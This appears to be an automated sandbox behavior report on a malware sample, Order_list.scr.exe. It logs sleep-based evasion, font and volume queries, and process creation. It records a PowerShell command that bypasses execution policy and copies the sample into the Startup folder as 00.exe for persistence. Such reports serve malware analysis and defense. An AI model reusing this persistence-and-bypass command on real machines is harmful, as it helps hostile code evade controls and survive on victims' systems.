Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597225s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -594265s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599824	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599699	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598936	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597382	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597137	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596853	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596511	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596296	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594417	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594305	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594181	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598897	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594265	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: svchost.exe, 00000004.00000002.3323487629.0000023A69A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3325003667.0000023A6F055000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Order_list.scr.exe, 00000003.00000002.4138704611.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4137789541.0000000000A36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Code function: 8_2_06327D90 LdrInitializeThunk,

8_2_06327D90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\Order_list.scr.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'

Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Users\user\Desktop\Order_list.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
